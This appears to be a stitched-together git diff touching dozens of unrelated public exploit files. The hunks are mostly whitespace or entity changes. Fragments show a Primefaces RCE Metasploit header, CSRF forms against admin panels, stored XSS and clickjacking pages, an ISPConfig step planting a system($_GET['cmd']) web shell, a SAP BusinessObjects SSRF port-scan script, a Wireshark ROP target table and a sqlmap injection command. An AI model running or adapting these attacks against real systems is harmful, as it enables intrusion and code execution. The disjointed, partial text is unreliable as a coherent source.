<input type="hidden" name="save" value=" Save Changes " />
|
<input type="hidden" name="save" value=" Save Changes " />
|
||||||
<input type="submit" value="Submit request" />
|
<input type="submit" value="Submit request" />
|
||||||
</form>
|
</form>
|
||||||
</body>
|
</body>
|
||||||
|
|
|
@ -155,7 +155,7 @@ START=90
|
||||||
ftpd &
|
ftpd &
|
||||||
|
|
||||||
" />
|
" />
|
||||||
<input type="hidden" name="save" value=" Save Changes " />
|
<input type="hidden" name="save" value=" Save Changes " />
|
||||||
<input type="submit" value="Submit request" />
|
<input type="submit" value="Submit request" />
|
||||||
</form>
|
</form>
|
||||||
</body>
|
</body>
|
||||||
|
|
|
@ -21,7 +21,7 @@ use threads;
|
||||||
use LWP::UserAgent;
|
use LWP::UserAgent;
|
||||||
|
|
||||||
|
|
||||||
print " Mohammad Reza Espargham\n www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";
|
print " Mohammad Reza Espargham\n www.reza.es\n\n Syntax: perl poc.pl 192.168.1.3\n\n";
|
||||||
|
|
||||||
|
|
||||||
$port=8080; #port
|
$port=8080; #port
|
||||||
|
|
|
@ -129,7 +129,7 @@ Add Directory</a> | <a id="AllSelect" href="javascript:selectAll()">Select All
|
||||||
| <a href="javascript:if(confirm('Are%20you%20sure%20to%20delete?'))delPhoto();"
|
| <a href="javascript:if(confirm('Are%20you%20sure%20to%20delete?'))delPhoto();"
|
||||||
id="del" style="color:#F30;">Delete</a></span>
|
id="del" style="color:#F30;">Delete</a></span>
|
||||||
<span style="position:absolute; left:10px;">Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/
|
<span style="position:absolute; left:10px;">Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/
|
||||||
<a href="javascript:window.location.href='..'"
|
<a href="javascript:window.location.href='..'"
|
||||||
style="color:#F60"> <<Up
|
style="color:#F60"> <<Up
|
||||||
Level</a></span><span id="photoCount"></span>
|
Level</a></span><span id="photoCount"></span>
|
||||||
|
|
||||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
|
'Name' => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
|
This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
|
||||||
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
|
Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
|
||||||
},
|
},
|
||||||
'Author' => [ 'Bjoern Schuette' ],
|
'Author' => [ 'Bjoern Schuette' ],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
|
|
@ -2,9 +2,9 @@
|
||||||
# Date:30/11/2011
|
# Date:30/11/2011
|
||||||
# Author: Alexey Sintsov
|
# Author: Alexey Sintsov
|
||||||
# Software Link: http://www.ibm.com/
|
# Software Link: http://www.ibm.com/
|
||||||
# Version:8.5.3/8.5.2 FP3 (0day)
|
# Version:8.5.3/8.5.2 FP3 (0day)
|
||||||
# Tested on: Windows 7 / Windows 2008
|
# Tested on: Windows 7 / Windows 2008
|
||||||
# CVE : CVE-2011-1519
|
# CVE : CVE-2011-1519
|
||||||
|
|
||||||
|
|
||||||
Application: IBM Lotus Domino Controller
|
Application: IBM Lotus Domino Controller
|
||||||
|
@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3
|
||||||
Manager 4.0 prior to Update 4
|
Manager 4.0 prior to Update 4
|
||||||
(0day)
|
(0day)
|
||||||
Vendor URL: http://ibm.com
|
Vendor URL: http://ibm.com
|
||||||
Bug: own XML parser
|
Bug: own XML parser
|
||||||
CVE: CVE-2011-1519
|
CVE: CVE-2011-1519
|
||||||
CVSS2: 9.0
|
CVSS2: 9.0
|
||||||
Exploits: YES
|
Exploits: YES
|
||||||
|
@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
|
||||||
|
|
||||||
This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
|
This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
|
||||||
but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
|
but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
|
||||||
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
|
Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
|
||||||
|
|
||||||
EXPLOIT:
|
EXPLOIT:
|
||||||
|
|
||||||
|
@ -66,8 +66,3 @@ height = "99%"
|
||||||
</applet>
|
</applet>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
|
||||||
# Date: Discovered and reported July 2012
|
# Date: Discovered and reported July 2012
|
||||||
# Author: Jacob Holcomb/Gimppy042
|
# Author: Jacob Holcomb/Gimppy042
|
||||||
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
|
# Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
|
||||||
# CVE : CVE-2012-4051 for the CSRF
|
# CVE : CVE-2012-4051 for the CSRF
|
||||||
|
|
||||||
|
|
||||||
<head>
|
<head>
|
||||||
|
|
|
@ -14,9 +14,9 @@ highlighted remember password.
|
||||||
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
|
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
|
||||||
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
|
||||||
InyeXion, ksha, zerial,LinuxFer, Scorp
|
InyeXion, ksha, zerial,LinuxFer, Scorp
|
||||||
her0, r0dr1 y demas user de RemoteExecution
|
her0, r0dr1 y demas user de RemoteExecution
|
||||||
www.remoteexecution.info www.remoteexcution.com.ar
|
www.remoteexecution.info www.remoteexcution.com.ar
|
||||||
#RemoteExecution Hacking Group
|
#RemoteExecution Hacking Group
|
||||||
|
|
||||||
[PoC]
|
[PoC]
|
||||||
|
|
||||||
|
|
|
@ -132,8 +132,8 @@ addr_os = {
|
||||||
# ID # OS # STACK SIZE # GADGET TABLE
|
# ID # OS # STACK SIZE # GADGET TABLE
|
||||||
1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
|
1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
|
||||||
2 : ["Labs test ", 0xbf, labs_rop_chain],
|
2 : ["Labs test ", 0xbf, labs_rop_chain],
|
||||||
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb
|
-1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb
|
||||||
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb
|
-2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb
|
||||||
-3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
|
-3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
|
||||||
-4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
|
-4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm
|
||||||
-5 : ["Ubuntu 10.10 | 11.04 ", -1, False], #
|
-5 : ["Ubuntu 10.10 | 11.04 ", -1, False], #
|
||||||
|
|
|
@ -38,7 +38,7 @@ print "Sent\n";
|
||||||
|
|
||||||
while (<$remote>)
|
while (<$remote>)
|
||||||
{
|
{
|
||||||
print $_;
|
print $_;
|
||||||
}
|
}
|
||||||
print "\n";
|
print "\n";
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@ While logged in as admin user:
|
||||||
|
|
||||||
3) log in as that user
|
3) log in as that user
|
||||||
|
|
||||||
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
|
4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
|
||||||
|
|
||||||
|
|
||||||
5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh
|
5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
# Date: 12/12/2020
|
# Date: 12/12/2020
|
||||||
# Exploit Author: IHTeam
|
# Exploit Author: IHTeam
|
||||||
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
|
# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
|
||||||
# Vendor Homepage: https://www.terra-master.com/
|
# Vendor Homepage: https://www.terra-master.com/
|
||||||
# Version: <= 4.2.06
|
# Version: <= 4.2.06
|
||||||
# Tested on: 4.1.30, 4.2.06
|
# Tested on: 4.1.30, 4.2.06
|
||||||
|
|
||||||
|
|
|
@ -30,9 +30,9 @@ Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong
|
||||||
<br>
|
<br>
|
||||||
<br>
|
<br>
|
||||||
<br>
|
<br>
|
||||||
<font style="font-family:arial;font-size:32px">Look Here<br>
|
<font style="font-family:arial;font-size:32px">Look Here<br>
|
||||||
| <br>
|
| <br>
|
||||||
V
|
V
|
||||||
|
|
||||||
<script>
|
<script>
|
||||||
|
|
||||||
|
|
|
@ -8,7 +8,7 @@ Opera</font><font face="Calibri" size="6" color="#FF0000">
|
||||||
<font face="Arial" size="2"><code class="xml plain">
|
<font face="Arial" size="2"><code class="xml plain">
|
||||||
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
|
(V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
|
||||||
<b>Clickjacking</b></code></font></p>
|
<b>Clickjacking</b></code></font></p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<div class="style1" id="open"
|
<div class="style1" id="open"
|
||||||
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
|
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
|
||||||
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
||||||
|
@ -32,8 +32,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
|
||||||
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<font size="1" color="#FFFFFF">ClickJacking</font></div>
|
<font size="1" color="#FFFFFF">ClickJacking</font></div>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
|
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
|
||||||
<p align="center">http://Securitylab.ir/Advisory</p>
|
<p align="center">http://Securitylab.ir/Advisory</p>
|
||||||
</html>
|
</html>
|
|
@ -8,7 +8,7 @@ Safari</font><font face="Calibri" size="6" color="#FF0000">
|
||||||
<font face="Arial" size="2"><code class="xml plain">
|
<font face="Arial" size="2"><code class="xml plain">
|
||||||
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
|
(V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
|
||||||
<b>Clickjacking</b></code></font></p>
|
<b>Clickjacking</b></code></font></p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<div class="style1" id="open"
|
<div class="style1" id="open"
|
||||||
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
|
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
|
||||||
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
||||||
|
@ -33,8 +33,8 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<font size="1" color="#FFFFFF">ClickJacking</font></div>
|
<font size="1" color="#FFFFFF">ClickJacking</font></div>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
|
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
|
||||||
<p align="center">http://Securitylab.ir/Advisory</p>
|
<p align="center">http://Securitylab.ir/Advisory</p>
|
||||||
</html>
|
</html>
|
|
@ -7,7 +7,7 @@
|
||||||
<font face="Arial" size="2"><code class="xml plain">
|
<font face="Arial" size="2"><code class="xml plain">
|
||||||
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
|
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
|
||||||
<b>Clickjacking</b></code></font></p>
|
<b>Clickjacking</b></code></font></p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<div class="style1" id="open"
|
<div class="style1" id="open"
|
||||||
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
|
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
|
||||||
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
||||||
|
@ -31,8 +31,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
|
||||||
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<font size="1" color="#FFFFFF">ClickJacking</font></div>
|
<font size="1" color="#FFFFFF">ClickJacking</font></div>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
|
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
|
||||||
<p align="center">http://Securitylab.ir/Advisory</p>
|
<p align="center">http://Securitylab.ir/Advisory</p>
|
||||||
</html>
|
</html>
|
|
@ -11,9 +11,9 @@ Create Database:
|
||||||
<td><div id="dbname_error"></div></td>
|
<td><div id="dbname_error"></div></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
<td><center><input type="submit" id="submit_dbname" value="Create Database" class="input-button" /></center></td>
|
<td><center><input type="submit" id="submit_dbname" value="Create Database" class="input-button" /></center></td>
|
||||||
<td> </td>
|
<td> </td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</div>
|
</div>
|
||||||
|
@ -36,9 +36,9 @@ Add Redirect:
|
||||||
http://<span id="wwwtxt">(www.)?</span><select name="domain" onChange="EnableDisableRadio();">
|
http://<span id="wwwtxt">(www.)?</span><select name="domain" onChange="EnableDisableRadio();">
|
||||||
<option selected value=".*">** All Public Domains **</a>
|
<option selected value=".*">** All Public Domains **</a>
|
||||||
<option value="siteismi.com">sEc-r1z.com</option></select>
|
<option value="siteismi.com">sEc-r1z.com</option></select>
|
||||||
</select>/ <input name=path type=text size="20" id="urlpath">
|
</select>/ <input name=path type=text size="20" id="urlpath">
|
||||||
<br />redirects to→
|
<br />redirects to→
|
||||||
<input id="url" name="url" type="text" size="50">
|
<input id="url" name="url" type="text" size="50">
|
||||||
|
|
||||||
<br />
|
<br />
|
||||||
<noscript>
|
<noscript>
|
||||||
|
@ -66,7 +66,7 @@ Add Redirect:
|
||||||
</p>
|
</p>
|
||||||
</form></div>
|
</form></div>
|
||||||
<p class="description">
|
<p class="description">
|
||||||
<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
|
<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
|
||||||
</p>
|
</p>
|
||||||
<!-- <br /> -->
|
<!-- <br /> -->
|
||||||
<h2>Current Redirects</h2>
|
<h2>Current Redirects</h2>
|
||||||
|
|
|
@ -6,15 +6,15 @@
|
||||||
# Software: Ajax Upload
|
# Software: Ajax Upload
|
||||||
# http://valums.com/ajax-upload/
|
# http://valums.com/ajax-upload/
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
|
|
||||||
[Comment]
|
[Comment]
|
||||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
||||||
Lezaeta, Inyexion, Login-Root, KikoArg, Ricota, Truenex, _tty0, Big,
|
Lezaeta, Inyexion, Login-Root, KikoArg, Ricota, Truenex, _tty0, Big,
|
||||||
Sunplace,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet,
|
Sunplace,Erick Jordan,Animacco ,yojota, Pablin77, SPEED, Knet,
|
||||||
Cereal, Yago, Rash, MagnoBalt, El Rodrix,NetT0xic,Gusan0r,Lucas Apa,
|
Cereal, Yago, Rash, MagnoBalt, El Rodrix,NetT0xic,Gusan0r,Lucas Apa,
|
||||||
Maxi Soler, Darioxchx,r0dr1,Zer0-Zo0rg
|
Maxi Soler, Darioxchx,r0dr1,Zer0-Zo0rg
|
||||||
|
|
||||||
|
|
||||||
[Arbitrary File Upload]
|
[Arbitrary File Upload]
|
||||||
|
|
||||||
You can upload any file you want by bypasss extesion wing headers, if
|
You can upload any file you want by bypasss extesion wing headers, if
|
||||||
|
|
|
@ -1,18 +1,18 @@
|
||||||
# Exploit Title: Logitech Media Server : HTML code injection and execution.
|
# Exploit Title: Logitech Media Server : HTML code injection and execution.
|
||||||
# Shodan Dork: Search Logitech Media Server
|
# Shodan Dork: Search Logitech Media Server
|
||||||
# Date: 11/03/2017
|
# Date: 11/03/2017
|
||||||
# Exploit Author: Dewank Pant
|
# Exploit Author: Dewank Pant
|
||||||
# Vendor Homepage: www.logitech.com
|
# Vendor Homepage: www.logitech.com
|
||||||
# Version: 7.9.0
|
# Version: 7.9.0
|
||||||
# Tested on: Windows 10, Linux
|
# Tested on: Windows 10, Linux
|
||||||
# CVE : Applied For.
|
# CVE : Applied For.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
POC:
|
POC:
|
||||||
|
|
||||||
1. Access and go to the Radio URL tab and add a new URL.
|
1. Access and go to the Radio URL tab and add a new URL.
|
||||||
2. Add script as the value of the field.
|
2. Add script as the value of the field.
|
||||||
3. Payload : <script> alert(1)</script>
|
3. Payload : <script> alert(1)</script>
|
||||||
4. Script saved and gives an image msg with a javascript execution on image click.
|
4. Script saved and gives an image msg with a javascript execution on image click.
|
||||||
5. Therefore, Persistent XSS.
|
5. Therefore, Persistent XSS.
|
|
@ -19,8 +19,8 @@ import sys
|
||||||
|
|
||||||
if len(sys.argv) != 4:
|
if len(sys.argv) != 4:
|
||||||
|
|
||||||
print "Usage: python sblpta.py http://path.faces targetIP targetPort"
|
print "Usage: python sblpta.py http://path.faces targetIP targetPort"
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
url = sys.argv[1]
|
url = sys.argv[1]
|
||||||
targetIP = sys.argv[2]
|
targetIP = sys.argv[2]
|
||||||
|
@ -33,15 +33,15 @@ gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
|
||||||
request = urllib2.Request(url, headers=headers)
|
request = urllib2.Request(url, headers=headers)
|
||||||
page = urllib2.urlopen(request, context=gcontext)
|
page = urllib2.urlopen(request, context=gcontext)
|
||||||
print "[*] Connected to SAP Bussiness Object %s" %url
|
print "[*] Connected to SAP Bussiness Object %s" %url
|
||||||
|
|
||||||
except:
|
except:
|
||||||
|
|
||||||
print "[-] Failed To connect to SAP Bussiness Object %s" %url
|
print "[-] Failed To connect to SAP Bussiness Object %s" %url
|
||||||
print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
|
print "[*] SAP Bussiness Object Link example: http://domain:port/BZ/portal/95000047/InfoView/logon.faces"
|
||||||
sys.exit(2)
|
sys.exit(2)
|
||||||
|
|
||||||
|
|
||||||
resheaders = page.info()
|
resheaders = page.info()
|
||||||
|
@ -50,50 +50,50 @@ content = page.readlines()
|
||||||
|
|
||||||
for line in content:
|
for line in content:
|
||||||
|
|
||||||
if "com.sun.faces.VIEW" in line:
|
if "com.sun.faces.VIEW" in line:
|
||||||
sfview = line.split("=")[4].split("\"")[1]
|
sfview = line.split("=")[4].split("\"")[1]
|
||||||
print "[*] Got java faces dynamic value"
|
print "[*] Got java faces dynamic value"
|
||||||
|
|
||||||
else:
|
else:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if not sfview:
|
if not sfview:
|
||||||
|
|
||||||
print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
|
print "[-] Failed to java faces dynamic value, are you sure you extracted the java faces form from the link ??"
|
||||||
sys.exit(3)
|
sys.exit(3)
|
||||||
|
|
||||||
|
|
||||||
formdata = {"_id0:logon:CMS":targetHostIP,
|
formdata = {"_id0:logon:CMS":targetHostIP,
|
||||||
"_id0:logon:USERNAME":"",
|
"_id0:logon:USERNAME":"",
|
||||||
"_id0:logon:PASSWORD":"",
|
"_id0:logon:PASSWORD":"",
|
||||||
"com.sun.faces.VIEW":sfview,
|
"com.sun.faces.VIEW":sfview,
|
||||||
"_id0":"_id0"
|
"_id0":"_id0"
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
data_encode = urllib.urlencode(formdata)
|
data_encode = urllib.urlencode(formdata)
|
||||||
start = datetime.now()
|
start = datetime.now()
|
||||||
print "[*] Testing Timing Attack %s" %start
|
print "[*] Testing Timing Attack %s" %start
|
||||||
request = urllib2.Request(url,data_encode)
|
request = urllib2.Request(url,data_encode)
|
||||||
request.add_header('Cookie', cookie)
|
request.add_header('Cookie', cookie)
|
||||||
response = urllib2.urlopen(request)
|
response = urllib2.urlopen(request)
|
||||||
end = datetime.now()
|
end = datetime.now()
|
||||||
the_page = response.read()
|
the_page = response.read()
|
||||||
|
|
||||||
|
|
||||||
if "FWM" in the_page:
|
if "FWM" in the_page:
|
||||||
|
|
||||||
elapsedTime = end-start
|
elapsedTime = end-start
|
||||||
if elapsedTime.total_seconds() >= 10:
|
if elapsedTime.total_seconds() >= 10:
|
||||||
|
|
||||||
print "[*] Port %s is Open, Gotcha !!! " %targetPort
|
print "[*] Port %s is Open, Gotcha !!! " %targetPort
|
||||||
|
|
||||||
else:
|
else:
|
||||||
|
|
||||||
print "[*] Port %s is Closed , we die fast" %targetPort
|
print "[*] Port %s is Closed , we die fast" %targetPort
|
||||||
|
|
||||||
elif "FWC" in the_page:
|
elif "FWC" in the_page:
|
||||||
|
|
||||||
print "[-] error login expired"
|
print "[-] error login expired"
|
||||||
sys.exit(10)
|
sys.exit(10)
|
|
@ -7,8 +7,8 @@
|
||||||
# Tested on: BackBox Linux
|
# Tested on: BackBox Linux
|
||||||
# CVE : CVE-2021-3018
|
# CVE : CVE-2021-3018
|
||||||
|
|
||||||
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
|
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
|
||||||
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
|
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
|
||||||
Parameter: id (GET based)
|
Parameter: id (GET based)
|
||||||
Use SQLmap if you've found the valid id...
|
Use SQLmap if you've found the valid id...
|
||||||
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
|
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
|
||||||
|
|
|
@ -18,7 +18,7 @@
|
||||||
<input type="password" name="newpass2" size="40" maxlength="20" /></td>
|
<input type="password" name="newpass2" size="40" maxlength="20" /></td>
|
||||||
<input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
|
<input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
|
||||||
<input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
|
<input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
|
||||||
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />
|
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />
|
||||||
<input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
|
<input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
|
||||||
<input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
|
<input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
|
||||||
<input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />
|
<input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />
|
||||||
|
|
|
@ -73,7 +73,7 @@ $datai=dechex(ord($headeri[$ii]));
|
||||||
if ($ji==16) {
|
if ($ji==16) {
|
||||||
$ji=0;
|
$ji=0;
|
||||||
$ci++;
|
$ci++;
|
||||||
echo "<td> </td>";
|
echo "<td> </td>";
|
||||||
for ($li=0; $li<=15; $li++)
|
for ($li=0; $li<=15; $li++)
|
||||||
{ echo "<td>".$headeri[$li+$ki]."</td>";
|
{ echo "<td>".$headeri[$li+$ki]."</td>";
|
||||||
}
|
}
|
||||||
|
@ -86,7 +86,7 @@ $ii++;
|
||||||
$ji++;
|
$ji++;
|
||||||
}
|
}
|
||||||
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
|
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
|
||||||
{ echo "<td> </td>";
|
{ echo "<td> </td>";
|
||||||
}
|
}
|
||||||
|
|
||||||
for ($li=$ci*16; $li<=strlen($headeri); $li++)
|
for ($li=$ci*16; $li<=strlen($headeri); $li++)
|
||||||
|
|
|
@ -11,11 +11,11 @@
|
||||||
#
|
#
|
||||||
# if(empty($admin_name))
|
# if(empty($admin_name))
|
||||||
# {
|
# {
|
||||||
# $errorMessage=warning." Username is empty!";
|
# $errorMessage=warning." Username is empty!";
|
||||||
# }
|
# }
|
||||||
# elseif(empty($admin_password))
|
# elseif(empty($admin_password))
|
||||||
# {
|
# {
|
||||||
# $errorMessage=warning." Password is empty!";
|
# $errorMessage=warning." Password is empty!";
|
||||||
# }
|
# }
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
|
@ -18,7 +18,7 @@ Contact Me : Eg[At]Hack[DoT]Cl
|
||||||
|
|
||||||
<title>WebSiteBaker 2.8.1 DataBase Backup</title>
|
<title>WebSiteBaker 2.8.1 DataBase Backup</title>
|
||||||
|
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
|
<p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
|
||||||
DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
|
DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
|
||||||
